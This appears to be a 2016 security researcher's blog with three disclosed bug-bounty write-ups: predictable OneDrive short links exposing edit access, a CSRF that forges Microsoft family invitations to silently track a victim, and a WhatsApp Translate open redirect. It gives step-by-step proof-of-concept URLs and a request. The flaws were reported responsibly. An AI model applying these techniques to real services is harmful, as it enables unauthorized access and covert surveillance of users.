Thursday, 28 July 2016

How i made Microsoft remove shorten links for Onedrive documents.

In the name of Allah the beneficent the Merciful.

 

Few months ago I  found vulnerability in Microsoft's Onedrive where i could have  get the editable link for documents in one drive from "view only" link.

  Proof of concept Steps:
1) Login as victim in browser A and go to onedrive.live.com
2) Upload any document or file and then open the document like this
https://onedrive.live.com/view.aspx?cid=0cf9bc876832caee&page=view&resid=CF9BC876832CAEE!106&parId=CF9BC876832CAEE!103&app=Word

3) Now open share and then create two links
  a) edit link
  b) View only link

4) After that shorten the links using "Shorten link" hyperlink beside
the edit link and view only link.
5) Then you can see a shortened link in this format
View only :
http://1drv.ms/1pFlbbq

Edit :
http://1drv.ms/1pFl93x

6) Notice that in above urls the only difference is last 3 characters.
7) Now give the view only link to attacker .
8) Attacker will use the view only link and he can predict the last 3
characters .

Hence it was possible to escalate the privilege and finally attacker
will get editable link for document.

Note :  characters in (http://1drv.ms/1pFlbbq)  were combination of a-z
 , A-Z and 0-9 only)
So, it was not difficult for attacker to  predict them.


Microsoft accepted the bug as valid and fixed the issue by completely removing shortened links . Now you can't do shorten the onedrive links . Microsoft also acknowledge me for Reporting the bug as security researcher.

 

  Iam very happy to safe the privacy of microsoft users data.


Thanks for Reading
Jai Hind  :) 
Contact  info :
facebook : facebook.com/haji.mohd871
twitter : @mohdhaji24
linkedin :  linkedin.com/in/mohd-haji-490960a0 

 

 

 


Microsoft user data privacy exposed -- Adding any microsoft user as family member and tracking their information

In the name of Allah the beneficent the Merciful.

 

Few months Ago i discovered CSRF issue in microsoft which could have let me add any microsoft user as family member and then track their information.


This was a serious issue in  https://account.microsoft.com/family#/
 By this bug i could have made the victim to accept family
member invitation.

Proof of Concept steps :

Suppose attacker has two emails  attacker@outlook.comattacker1@outlook.com
and victim has one email  victim@outlook.com

1)Login as attacker@outlook.com and  go to
https://account.microsoft.com/family#/
and then add victim@outlook.com as your child in family member section.

2) Then add attacker1@outlook.com also as child .

3) Microsoft will send an email to accept invitation to both the accounts
 attacker1@outlook.com and  victim@outlook.com .

4) Now attacker will go to   attacker1@outlook.com
and he will look for the invitation email .
It looks like this


https://account.microsoft.com/family/invite-accept?invitationToken=ABQAFgEU1tvx-TFV0tYsdJFrOsNUa36IKGoOZgAADIAAABCKaYH-hI1ydg-ig5HcA8dywADb-R160uVY7cZdQyz65YRGk3hGQkUlI1rVLOOeXBsf5RFBm6Bf2LMTK604r6imsrAgMJqoA1UfWcBz4ceTBqc23iNphZRB3y1pWBXNxiSKh-CbKbzSQSaO8e7SUbSxujDbUDLtlulRuE5bc5afNnhIFIa6lM1sDghHj5kYt0nPcNqLJeVqNUdykXnUe4WRf9H9e7kzZUyqbPHYs69kAAJJY1oSF8dniMEG7x_JwkVzpOGkXCaZdwt_xJsxYjjAS7kgADrHkgB0cOsFV-fLJ9FlKXgfdtyMOHUXn4tl-4TTLGxD&cid=934985687410854638&email=YXR0YWNrZXIxQG91dGxvb2suY29t&ma=0&lang=en-US

5) In the above link  see the parameter
email=

YXR0YWNrZXIxQG91dGxvb2suY29t

this is base 64 of attacker1@outlook.com

6) So, now attacker will base 64 victim's email address
i.e,,  base64(victim@outlook.com)  is  dmljdGltQG91dGxvb2suY29t

Now replace with the above email then it becomes



https://account.microsoft.com/family/invite-accept?invitationToken=ABQAFgEU1tvx-TFV0tYsdJFrOsNUa36IKGoOZgAADIAAABCKaYH-hI1ydg-ig5HcA8dywADb-R160uVY7cZdQyz65YRGk3hGQkUlI1rVLOOeXBsf5RFBm6Bf2LMTK604r6imsrAgMJqoA1UfWcBz4ceTBqc23iNphZRB3y1pWBXNxiSKh-CbKbzSQSaO8e7SUbSxujDbUDLtlulRuE5bc5afNnhIFIa6lM1sDghHj5kYt0nPcNqLJeVqNUdykXnUe4WRf9H9e7kzZUyqbPHYs69kAAJJY1oSF8dniMEG7x_JwkVzpOGkXCaZdwt_xJsxYjjAS7kgADrHkgB0cOsFV-fLJ9FlKXgfdtyMOHUXn4tl-4TTLGxD&cid=934985687410854638&email=
dmljdGltQG91dGxvb2suY29t&ma=0&lang=en-US



7) Now when you give the above link to victim@outlook.com it will ask
for confirmation .

Okay not bad there is mitigation for that as well :)

just append matchAccount=true  to the above url

then it will become like this





https://account.microsoft.com/family/invite-accept?invitationToken=ABQAFgEU1tvx-TFV0tYsdJFrOsNUa36IKGoOZgAADIAAABCKaYH-hI1ydg-ig5HcA8dywADb-R160uVY7cZdQyz65YRGk3hGQkUlI1rVLOOeXBsf5RFBm6Bf2LMTK604r6imsrAgMJqoA1UfWcBz4ceTBqc23iNphZRB3y1pWBXNxiSKh-CbKbzSQSaO8e7SUbSxujDbUDLtlulRuE5bc5afNnhIFIa6lM1sDghHj5kYt0nPcNqLJeVqNUdykXnUe4WRf9H9e7kzZUyqbPHYs69kAAJJY1oSF8dniMEG7x_JwkVzpOGkXCaZdwt_xJsxYjjAS7kgADrHkgB0cOsFV-fLJ9FlKXgfdtyMOHUXn4tl-4TTLGxD&cid=934985687410854638&email=
dmljdGltQG91dGxvb2suY29t&ma=0&lang=en-US&matchAccount=true



8) Perfect now when you give the above link to victim@outlook.com ,
then csrf will be performed  without his verification  .
And victim@outlook.com  will be verified as child of attacker@outlook.com


Impact of Vulnerability :
The impact of this bug was very dangerous.Attacker would have  get to know victim's activity , their history ,webbrowsing , could have blocked few websites for him , etc.

 Microsoft Has fixed the issue and acknowledge as security researcher.
Now it's no longer possible to add anyone as our family member.

  Iam very happy to safe the privacy of microsoft users data.

Here is CTF key :  596f755f676f745f696e746f5f626c6f67

Thanks for Reading
Jai Hind  :) 
Contact  info :
facebook : facebook.com/haji.mohd871
twitter : @mohdhaji24
linkedin :  linkedin.com/in/mohd-haji-490960a0 

 


Wednesday, 27 July 2016

Facebook's Acquisition Whatsapp Translate Open Redirection

In the name of Allah the beneficent the Merciful.

 

It was a thursday night (day before my semester exam) when i came to know that whatsapp is now a part of Facebook bug bounty and started hunting on it.
 Soon i discovered an open redirection Flaw in whatsapp translate website  translate.whatsapp.com .

Whatsapp translate has more than 10 million of it's users in all over the world.

Open redirection occurs when application doesn't validate the url which victim is visiting . This gives attacker to redirect victim's to malicious sites and perform phishing ,etc kind of attacks.

 

Here is the POST request 

 

GET /sign-in?next=http://google.com/ HTTP/1.1
Host: translate.whatsapp.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/49.0.2623.108 Chrome/49.0.2623.108 Safari/537.36
Referer: https://translate.whatsapp.com/ 

 

 

After sign in whatsapp translate would have redirected user to google.com .

 

Here is the Video Proof of Concept demonstrating attack.

 

 Unfortunately After few days i got response from Facebook Security Team saying it's a duplicate issue.

 

  

 

Thanks for Reading
Jai Hind  :) 
Contact  info :
facebook : facebook.com/haji.mohd871
twitter : @mohdhaji24
linkedin :  linkedin.com/in/mohd-haji-490960a0